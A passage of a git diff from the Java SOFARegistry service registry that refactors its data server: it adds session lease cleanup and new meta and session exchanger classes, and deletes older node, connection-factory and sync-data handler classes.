not init when check session lease"); + return Collections.emptySet(); + } + List channels = server.getChannels(); + Set ret = Sets.newHashSetWithExpectedSize(128); + for (Channel channel : channels) { + BoltChannel boltChannel = (BoltChannel) channel; + ProcessId processId = + (ProcessId) + boltChannel.getConnection().getAttribute(ValueConstants.ATTR_RPC_CHANNEL_PROCESS_ID); + if (processId != null) { + ret.add(processId); + } + } + LOGGER.info("find processId from channels={}, {}", channels.size(), ret); + return ret; + } + + private final class LeaseCleaner extends LoopRunnable { + @Override + public void runUnthrowable() { + clean(); + } + + @Override + public void waitingUnthrowable() { + // CPU overhead is high + ConcurrentUtils.sleepUninterruptibly( + dataServerConfig.getSessionLeaseCheckIntervalSecs(), TimeUnit.SECONDS); + } + } + + void clean() { + // 1. renew the lease by conn and meta + Set connProcessIds = getProcessIdsInConnection(); + renewBy(connProcessIds); + Set metaProcessIds = metaServerService.getSessionProcessIds(); + renewBy(metaProcessIds); + // 2. update the processId again, if has full gc, + connProcessIds = getProcessIdsInConnection(); + metaProcessIds = metaServerService.getSessionProcessIds(); + + cleanExpireLease(dataServerConfig.getSessionLeaseSecs() * 1000, connProcessIds, metaProcessIds); + cleanStorage(); + + // compact the unpub + long tombstoneTimestamp = + System.currentTimeMillis() - dataServerConfig.getDatumCompactDelaySecs() * 1000; + Map compacted = localDatumStorage.compact(tombstoneTimestamp); + COMPACT_LOGGER.info("compact datum, {}", compacted); + } +} diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/node/DataNodeStatus.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/node/DataNodeStatus.java deleted file mode 100644 index 3273ec221..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/node/DataNodeStatus.java +++ /dev/null @@ -1,41 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.node; - -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.server.data.util.LocalServerStatusEnum; - -/** - * @author xuanbei - * @since 2019/2/15 - */ -public class DataNodeStatus { - private static final Logger LOGGER = LoggerFactory.getLogger(DataNodeStatus.class); - private volatile LocalServerStatusEnum status = LocalServerStatusEnum.INITIAL; - - public LocalServerStatusEnum getStatus() { - return status; - } - - public void setStatus(LocalServerStatusEnum status) { - LocalServerStatusEnum originStatus = this.status; - this.status = status; - LOGGER.info("[DataNodeStatus] status change from {} to {}", originStatus.name(), - status.name()); - } -} diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/node/DataServerNode.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/node/DataServerNode.java deleted file mode 100644 index f7bff800e..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/node/DataServerNode.java +++ /dev/null @@ -1,87 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.node; - -import com.alipay.remoting.Connection; -import com.alipay.sofa.registry.consistency.hash.HashNode; - -/** - * - * @author qian.lqlq - * @version $Id: DataServerNode.java, v 0.1 2018-03-13 18:29 qian.lqlq Exp $ - */ -public class DataServerNode implements HashNode { - - private String ip; - - private String dataCenter; - - private Connection connection; - - /** - * constructor - * @param ip - * @param dataCenter - * @param connection - */ - public DataServerNode(String ip, String dataCenter, Connection connection) { - this.ip = ip; - this.dataCenter = dataCenter; - this.connection = connection; - } - - @Override - public String getNodeName() { - return ip; - } - - /** - * Getter method for property ip. - * - * @return property value of ip - */ - public String getIp() { - return ip; - } - - /** - * Getter method for property dataCenter. - * - * @return property value of dataCenter - */ - public String getDataCenter() { - return dataCenter; - } - - /** - * Getter method for property connection. - * - * @return property value of connection - */ - public Connection getConnection() { - return connection; - } - - @Override - public String toString() { - final StringBuilder sb = new StringBuilder("DataServerNode{"); - sb.append("ip='").append(ip).append('\''); - sb.append(", dataCenter='").append(dataCenter); - sb.append('}'); - return sb.toString(); - } -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/DataMetaServerManager.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/DataMetaServerManager.java new file mode 100644 index 000000000..6e557d49a --- /dev/null +++ b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/DataMetaServerManager.java @@ -0,0 +1,52 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data.remoting; + +import com.alipay.sofa.registry.server.data.bootstrap.DataServerConfig; +import com.alipay.sofa.registry.server.shared.meta.AbstractMetaServerManager; +import com.google.common.annotations.VisibleForTesting; +import java.util.Collection; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author chen.zhu + *

Mar 15, 2021 + */ +public class DataMetaServerManager extends AbstractMetaServerManager { + + @Autowired private DataServerConfig dataServerConfig; + + @Override + protected Collection getConfiguredMetaServerDomains() { + return dataServerConfig.getMetaServerAddresses(); + } + + @Override + public int getRpcTimeoutMillis() { + return dataServerConfig.getRpcTimeoutMillis(); + } + + @Override + public int getServerPort() { + return dataServerConfig.getMetaServerPort(); + } + + @VisibleForTesting + void setDataServerConfig(DataServerConfig dataServerConfig) { + this.dataServerConfig = dataServerConfig; + } +} diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/DataNodeExchanger.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/DataNodeExchanger.java index 23b9865c3..7348b12c6 100644 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/DataNodeExchanger.java +++ b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/DataNodeExchanger.java @@ -16,86 +16,50 @@ */ package com.alipay.sofa.registry.server.data.remoting; -import com.alipay.sofa.registry.common.model.store.URL; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.remoting.Channel; import com.alipay.sofa.registry.remoting.ChannelHandler; -import com.alipay.sofa.registry.remoting.Client; import com.alipay.sofa.registry.remoting.exchange.Exchange; -import com.alipay.sofa.registry.remoting.exchange.NodeExchanger; -import com.alipay.sofa.registry.remoting.exchange.message.Request; -import com.alipay.sofa.registry.remoting.exchange.message.Response; import com.alipay.sofa.registry.server.data.bootstrap.DataServerConfig; -import com.alipay.sofa.registry.server.data.remoting.handler.AbstractClientHandler; -import org.springframework.beans.factory.annotation.Autowired; - -import javax.annotation.Resource; +import com.alipay.sofa.registry.server.shared.remoting.ClientSideExchanger; +import com.google.common.annotations.VisibleForTesting; import java.util.Collection; +import java.util.Collections; +import org.springframework.beans.factory.annotation.Autowired; /** * @author xuanbei * @since 2019/2/15 */ -public class DataNodeExchanger implements NodeExchanger { - private static final Logger LOGGER = LoggerFactory - .getLogger(DataNodeExchanger.class); - - @Autowired - private Exchange boltExchange; - - @Autowired - private DataServerConfig dataServerBootstrapConfig; +public class DataNodeExchanger extends ClientSideExchanger { - @Resource(name = "dataClientHandlers") - private Collection dataClientHandlers; + @Autowired private DataServerConfig dataServerConfig; - @Override - public Response request(Request request) { - Channel channel = this.connect(request.getRequestUrl()); - Client client = boltExchange.getClient(Exchange.DATA_SERVER_TYPE); - LOGGER.info("DataNode Exchanger request={},url={},callbackHandler={}", request.getRequestBody(), - request.getRequestUrl(), request.getCallBackHandler()); + public DataNodeExchanger() { + super(Exchange.DATA_SERVER_TYPE); + } - if (null != request.getCallBackHandler()) { - client.sendCallback(channel, request.getRequestBody(), - request.getCallBackHandler(), - dataServerBootstrapConfig.getRpcTimeout()); - return () -> Response.ResultStatus.SUCCESSFUL; - } else { - final Object result = client.sendSync(channel, request.getRequestBody(), - dataServerBootstrapConfig.getRpcTimeout()); - return () -> result; - } - } + @Override + public int getRpcTimeoutMillis() { + return dataServerConfig.getRpcTimeoutMillis(); + } - public Channel connect(URL url) { - Client client = boltExchange.getClient(Exchange.DATA_SERVER_TYPE); - if (client == null) { - synchronized (this) { - client = boltExchange.getClient(Exchange.DATA_SERVER_TYPE); - if (client == null) { - client = boltExchange.connect(Exchange.DATA_SERVER_TYPE, url, - dataClientHandlers.toArray(new ChannelHandler[dataClientHandlers.size()])); - } - } - } + @Override + public int getServerPort() { + // the Exchanger only for sync data + return dataServerConfig.getSyncDataPort(); + } - Channel channel = client.getChannel(url); - if (channel == null) { - synchronized (this) { - channel = client.getChannel(url); - if (channel == null) { - channel = client.connect(url); - } - } - } + @Override + public int getConnNum() { + return dataServerConfig.getSyncDataConnNum(); + } - return channel; - } + @Override + protected Collection getClientHandlers() { + return Collections.emptyList(); + } - @Override - public Client connectServer() { - throw new UnsupportedOperationException(); - } + @VisibleForTesting + void setDataServerConfig(DataServerConfig dataServerConfig) { + this.dataServerConfig = dataServerConfig; + } } diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/MetaNodeExchanger.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/MetaNodeExchanger.java deleted file mode 100644 index 607beec97..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/MetaNodeExchanger.java +++ /dev/null @@ -1,113 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.remoting; - -import com.alipay.sofa.registry.common.model.store.URL; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.remoting.Channel; -import com.alipay.sofa.registry.remoting.ChannelHandler; -import com.alipay.sofa.registry.remoting.Client; -import com.alipay.sofa.registry.remoting.exchange.Exchange; -import com.alipay.sofa.registry.remoting.exchange.NodeExchanger; -import com.alipay.sofa.registry.remoting.exchange.message.Request; -import com.alipay.sofa.registry.remoting.exchange.message.Response; -import com.alipay.sofa.registry.server.data.bootstrap.DataServerConfig; -import com.alipay.sofa.registry.server.data.remoting.handler.AbstractClientHandler; -import com.alipay.sofa.registry.server.data.remoting.metaserver.IMetaServerService; -import org.springframework.beans.factory.annotation.Autowired; - -import javax.annotation.Resource; -import java.util.Collection; - -/** - * @author xuanbei - * @since 2019/2/15 - */ -public class MetaNodeExchanger implements NodeExchanger { - private static final Logger LOGGER = LoggerFactory - .getLogger(MetaNodeExchanger.class); - - @Autowired - private Exchange boltExchange; - - @Autowired - private IMetaServerService metaServerService; - - @Autowired - private DataServerConfig dataServerBootstrapConfig; - - @Resource(name = "metaClientHandlers") - private Collection metaClientHandlers; - - @Override - public Response request(Request request) { - Channel channel = connect(request.getRequestUrl()); - Client client = boltExchange.getClient(Exchange.META_SERVER_TYPE); - LOGGER.info("MetaNode Exchanger request={},url={},callbackHandler={}", request.getRequestBody(), - request.getRequestUrl(), request.getCallBackHandler()); - - try { - final Object result = client.sendSync(channel, request.getRequestBody(), - dataServerBootstrapConfig.getRpcTimeout()); - return () -> result; - } catch (Exception e) { - //retry - URL url = new URL(metaServerService.refreshLeader().getIp(), - dataServerBootstrapConfig.getMetaServerPort()); - channel = client.getChannel(url); - if (channel == null) { - channel = client.connect(url); - } - LOGGER.warn("MetaNode Exchanger request send error!It will be retry once!Request url:{}", url); - - final Object result = client.sendSync(channel, request.getRequestBody(), - dataServerBootstrapConfig.getRpcTimeout()); - return () -> result; - } - } - - public Channel connect(URL url) { - Client client = boltExchange.getClient(Exchange.META_SERVER_TYPE); - if (client == null) { - synchronized (this) { - client = boltExchange.getClient(Exchange.META_SERVER_TYPE); - if (client == null) { - client = boltExchange.connect(Exchange.META_SERVER_TYPE, url, - metaClientHandlers.toArray(new ChannelHandler[metaClientHandlers.size()])); - } - } - } - //try to connect data - Channel channel = client.getChannel(url); - if (channel == null) { - synchronized (this) { - channel = client.getChannel(url); - if (channel == null) { - channel = client.connect(url); - } - } - } - - return channel; - } - - @Override - public Client connectServer() { - throw new UnsupportedOperationException(); - } -} diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/SessionNodeExchanger.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/SessionNodeExchanger.java new file mode 100644 index 000000000..3eac4c946 --- /dev/null +++ b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/SessionNodeExchanger.java @@ -0,0 +1,64 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data.remoting; + +import com.alipay.sofa.registry.remoting.ChannelHandler; +import com.alipay.sofa.registry.remoting.exchange.Exchange; +import com.alipay.sofa.registry.server.data.bootstrap.DataServerConfig; +import com.alipay.sofa.registry.server.shared.remoting.ClientSideExchanger; +import com.google.common.annotations.VisibleForTesting; +import java.util.Collection; +import java.util.Collections; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-11-30 21:28 yuzhi.lyz Exp $ + */ +public class SessionNodeExchanger extends ClientSideExchanger { + @Autowired private DataServerConfig dataServerConfig; + + public SessionNodeExchanger() { + super(Exchange.SESSION_SERVER_TYPE); + } + + @Override + public int getRpcTimeoutMillis() { + return dataServerConfig.getRpcTimeoutMillis(); + } + + @Override + public int getServerPort() { + // the Exchanger only for sync session + return dataServerConfig.getSyncSessionPort(); + } + + @Override + public int getConnNum() { + return dataServerConfig.getSyncSessionConnNum(); + } + + @Override + protected Collection getClientHandlers() { + return Collections.emptyList(); + } + + @VisibleForTesting + void setDataServerConfig(DataServerConfig dataServerConfig) { + this.dataServerConfig = dataServerConfig; + } +} diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/dataserver/DataServerConnectionFactory.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/dataserver/DataServerConnectionFactory.java deleted file mode 100644 index 6cb2d8f9b..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/dataserver/DataServerConnectionFactory.java +++ /dev/null @@ -1,65 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.remoting.dataserver; - -import com.alipay.remoting.Connection; - -import java.util.Map; -import java.util.concurrent.ConcurrentHashMap; - -/** - * the factory to hold connections that other dataservers connected to local server - * - * @author qian.lqlq - * @version $Id: DataServerConnectionFactory.java, v 0.1 2018-03-07 17:52 qian.lqlq Exp $ - */ -public class DataServerConnectionFactory { - - /** - * collection of connections - * key:ip - */ - private final Map MAP = new ConcurrentHashMap<>(); - - /** - * register connection - * - * @param connection - */ - public void register(Connection connection) { - MAP.put(connection.getRemoteIP(), connection); - } - - /** - * remove connection by specific ip - * - * @param connection - */ - public void remove(Connection connection) { - MAP.remove(connection.getRemoteIP()); - } - - /** - * get connection by ip - * - * @param ip - * @return - */ - public Connection getConnection(String ip) { - return MAP.get(ip); - } -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/dataserver/DataServerNodeFactory.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/dataserver/DataServerNodeFactory.java deleted file mode 100644 index 53a484bea..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/dataserver/DataServerNodeFactory.java +++ /dev/null @@ -1,219 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.remoting.dataserver; - -import com.alipay.remoting.Connection; -import com.alipay.sofa.registry.consistency.hash.ConsistentHash; -import com.alipay.sofa.registry.server.data.bootstrap.DataServerConfig; -import com.alipay.sofa.registry.server.data.node.DataServerNode; -import com.google.common.collect.Lists; - -import java.util.HashMap; -import java.util.HashSet; -import java.util.List; -import java.util.Map; -import java.util.Set; -import java.util.concurrent.ConcurrentHashMap; -import java.util.concurrent.atomic.AtomicBoolean; - -/** - * the factory to hold other dataservers and connection connected to them - * - * @author qian.lqlq - * @version $Id: DataServerNodeFactory.java, v 0.1 2018-03-13 18:45 qian.lqlq Exp $ - */ -public class DataServerNodeFactory { - - /** - * row: dataCenter - * column: ip - * value dataServerNode - */ - private static final Map> MAP = new ConcurrentHashMap<>(); - - /** - * key: dataCenter - * value: consistentHash - */ - private static final Map> CONSISTENT_HASH_MAP = new ConcurrentHashMap<>(); - - private static AtomicBoolean init = new AtomicBoolean( - false); - - /** - * add a dataserver to cache - * - * @param dataServerNode - */ - public static void register(DataServerNode dataServerNode, - DataServerConfig dataServerBootstrapConfig) { - String dataCenter = dataServerNode.getDataCenter(); - if (!MAP.containsKey(dataCenter)) { - MAP.put(dataCenter, new ConcurrentHashMap<>()); - } - MAP.get(dataCenter).put(dataServerNode.getIp(), dataServerNode); - refreshConsistent(dataCenter, dataServerBootstrapConfig); - } - - /** - * refresh instance of consistentHash - * - * @param dataCenter - */ - public static void refreshConsistent(String dataCenter, - DataServerConfig dataServerBootstrapConfig) { - List dataServerNodes = Lists.newArrayList(MAP.get(dataCenter).values()); - if (dataServerBootstrapConfig.getLocalDataCenter().equals(dataCenter)) { - if (!MAP.get(dataCenter).keySet().contains(DataServerConfig.IP)) { - dataServerNodes.add(new DataServerNode(DataServerConfig.IP, - dataServerBootstrapConfig.getLocalDataCenter(), null)); - } - } - CONSISTENT_HASH_MAP.put(dataCenter, - new ConsistentHash<>(dataServerBootstrapConfig.getNumberOfReplicas(), dataServerNodes)); - } - - /** - * for single node consistentHash - * @param dataServerBootstrapConfig - */ - public static void initConsistent(DataServerConfig dataServerBootstrapConfig) { - if (init.compareAndSet(false, true)) { - List dataServerNodes = Lists.newArrayList(); - dataServerNodes.add(new DataServerNode(DataServerConfig.IP, dataServerBootstrapConfig - .getLocalDataCenter(), null)); - CONSISTENT_HASH_MAP.put(dataServerBootstrapConfig.getLocalDataCenter(), - new ConsistentHash<>(dataServerBootstrapConfig.getNumberOfReplicas(), - dataServerNodes)); - } - } - - /** - * get dataserver by specific datacenter and ip - * - * @param dataCenter - * @param ip - * @return - */ - public static DataServerNode getDataServerNode(String dataCenter, String ip) { - if (MAP.containsKey(dataCenter)) { - Map map = MAP.get(dataCenter); - if (map.containsKey(ip)) { - return map.get(ip); - } - } - return null; - } - - /** - * get dataservers by specific datacenter - * - * @param dataCenter - * @return - */ - public static Map getDataServerNodes(String dataCenter) { - if (MAP.containsKey(dataCenter)) { - return MAP.get(dataCenter); - } else { - return new HashMap<>(); - } - } - - /** - * get ip of dataservers by specific datacenter - * - * @param dataCenter - * @return - */ - public static Set getIps(String dataCenter) { - if (MAP.containsKey(dataCenter)) { - Map map = MAP.get(dataCenter); - if (map != null) { - return map.keySet(); - } - } - return new HashSet<>(); - } - - /** - * remove dataserver by specific datacenter and ip - * - * @param dataCenter - * @param ip - */ - public static void remove(String dataCenter, String ip, - DataServerConfig dataServerBootstrapConfig) { - if (MAP.containsKey(dataCenter)) { - Map map = MAP.get(dataCenter); - if (map != null) { - DataServerNode dataServerNode = map.get(ip); - Connection connection = dataServerNode.getConnection(); - if (connection != null && connection.isFine()) { - connection.close(); - } - map.remove(ip); - } - } - refreshConsistent(dataCenter, dataServerBootstrapConfig); - } - - /** - * remove dataservers by specific datacenter - * - * @param dataCenter - */ - public static void remove(String dataCenter) { - getDataServerNodes(dataCenter).values().stream().map(DataServerNode::getConnection) - .filter(connection -> connection != null && connection.isFine()).forEach(Connection::close); - MAP.remove(dataCenter); - CONSISTENT_HASH_MAP.remove(dataCenter); - } - - /** - * get dataserver by specific datacenter and dataInfoId - * - * @param dataCenter - * @param dataInfoId - * @return - */ - public static DataServerNode computeDataServerNode(String dataCenter, String dataInfoId) { - ConsistentHash consistentHash = CONSISTENT_HASH_MAP.get(dataCenter); - if (consistentHash != null) { - return CONSISTENT_HASH_MAP.get(dataCenter).getNodeFor(dataInfoId); - } - return null; - } - - public static List computeDataServerNodes(String dataCenter, String dataInfoId, - int backupNodes) { - ConsistentHash consistentHash = CONSISTENT_HASH_MAP.get(dataCenter); - if (consistentHash != null) { - return CONSISTENT_HASH_MAP.get(dataCenter).getNUniqueNodesFor(dataInfoId, backupNodes); - } - return null; - } - - /** - * get all datacenters - * - * @return - */ - public static Set getAllDataCenters() { - return MAP.keySet(); - } - -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/dataserver/GetSyncDataHandler.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/dataserver/GetSyncDataHandler.java deleted file mode 100644 index c315110ee..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/dataserver/GetSyncDataHandler.java +++ /dev/null @@ -1,85 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.remoting.dataserver; - -import com.alipay.sofa.registry.common.model.store.URL; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.remoting.CallbackHandler; -import com.alipay.sofa.registry.remoting.Channel; -import com.alipay.sofa.registry.remoting.exchange.message.Request; -import com.alipay.sofa.registry.server.data.remoting.DataNodeExchanger; -import org.springframework.beans.factory.annotation.Autowired; - -/** - * - * @author qian.lqlq - * @version $Id: GetSyncDataHandler.java, v 0.1 2018-03-08 14:18 qian.lqlq Exp $ - */ -public class GetSyncDataHandler { - - private static final Logger LOGGER = LoggerFactory.getLogger(GetSyncDataHandler.class); - - @Autowired - private DataNodeExchanger dataNodeExchanger; - - /** - * - * - * @param callback - */ - public void syncData(SyncDataCallback callback) { - int tryCount = callback.getRetryCount(); - if (tryCount > 0) { - try { - callback.setRetryCount(--tryCount); - dataNodeExchanger.request(new Request() { - @Override - public Object getRequestBody() { - return callback.getRequest(); - } - - @Override - public URL getRequestUrl() { - return new URL(callback.getConnection().getRemoteIP(), callback - .getConnection().getRemotePort()); - } - - @Override - public CallbackHandler getCallBackHandler() { - return new CallbackHandler() { - @Override - public void onCallback(Channel channel, Object message) { - callback.onResponse(message); - } - - @Override - public void onException(Channel channel, Throwable exception) { - callback.onException(exception); - } - }; - } - }); - } catch (Exception e) { - LOGGER.error("[GetSyncDataHandler] send sync data request failed", e); - } - } else { - LOGGER.info("[GetSyncDataHandler] sync data retry for three times"); - } - } - -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/dataserver/SyncDataCallback.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/dataserver/SyncDataCallback.java deleted file mode 100644 index a5785f314..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/dataserver/SyncDataCallback.java +++ /dev/null @@ -1,177 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.remoting.dataserver; - -import com.alipay.remoting.Connection; -import com.alipay.remoting.InvokeCallback; -import com.alipay.sofa.registry.common.model.GenericResponse; -import com.alipay.sofa.registry.common.model.dataserver.Datum; -import com.alipay.sofa.registry.common.model.dataserver.SyncData; -import com.alipay.sofa.registry.common.model.dataserver.SyncDataRequest; -import com.alipay.sofa.registry.common.model.store.Publisher; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.server.data.change.DataChangeTypeEnum; -import com.alipay.sofa.registry.server.data.change.DataSourceTypeEnum; -import com.alipay.sofa.registry.server.data.change.event.DataChangeEventCenter; -import com.alipay.sofa.registry.server.data.executor.ExecutorFactory; -import org.springframework.util.CollectionUtils; - -import java.util.Collection; -import java.util.Map; -import java.util.concurrent.Executor; - -/** - * - * @author qian.lqlq - * @version $Id: SyncDataCallback.java, v 0.1 2018-03-08 14:22 qian.lqlq Exp $ - */ -public class SyncDataCallback implements InvokeCallback { - - private static final Logger LOGGER = LoggerFactory.getLogger(SyncDataCallback.class); - - private static final Executor EXECUTOR = ExecutorFactory.newFixedThreadPool(20, - SyncDataCallback.class.getSimpleName()); - - private static final int RETRY_COUNT = 3; - - private Connection connection; - - private SyncDataRequest request; - - private GetSyncDataHandler getSyncDataHandler; - - private int retryCount; - - private DataChangeEventCenter dataChangeEventCenter; - - /** - * constructor - * @param connection - * @param request - */ - public SyncDataCallback(GetSyncDataHandler getSyncDataHandler, Connection connection, - SyncDataRequest request, DataChangeEventCenter dataChangeEventCenter) { - this.getSyncDataHandler = getSyncDataHandler; - this.connection = connection; - this.request = request; - this.retryCount = RETRY_COUNT; - this.dataChangeEventCenter = dataChangeEventCenter; - } - - @Override - public void onResponse(Object obj) { - GenericResponse response = (GenericResponse) obj; - if (!response.isSuccess()) { - getSyncDataHandler.syncData(this); - } else { - SyncData syncData = response.getData(); - Collection datums = syncData.getDatums(); - DataSourceTypeEnum dataSourceTypeEnum = DataSourceTypeEnum.valueOf(request - .getDataSourceType()); - LOGGER - .info( - "[SyncDataCallback] get syncDatas,datums size={},wholeTag={},dataCenter={},dataInfoId={}", - datums.size(), syncData.getWholeDataTag(), syncData.getDataCenter(), - syncData.getDataInfoId()); - if (syncData.getWholeDataTag()) { - //handle all data, replace cache with these datum directly - for (Datum datum : datums) { - if (datum == null) { - datum = new Datum(); - datum.setDataInfoId(syncData.getDataInfoId()); - datum.setDataCenter(syncData.getDataCenter()); - } - processDatum(datum); - dataChangeEventCenter.sync(DataChangeTypeEnum.COVER, dataSourceTypeEnum, datum); - break; - } - } else { - //handle incremental data one by one - if (!CollectionUtils.isEmpty(datums)) { - for (Datum datum : datums) { - if (datum != null) { - 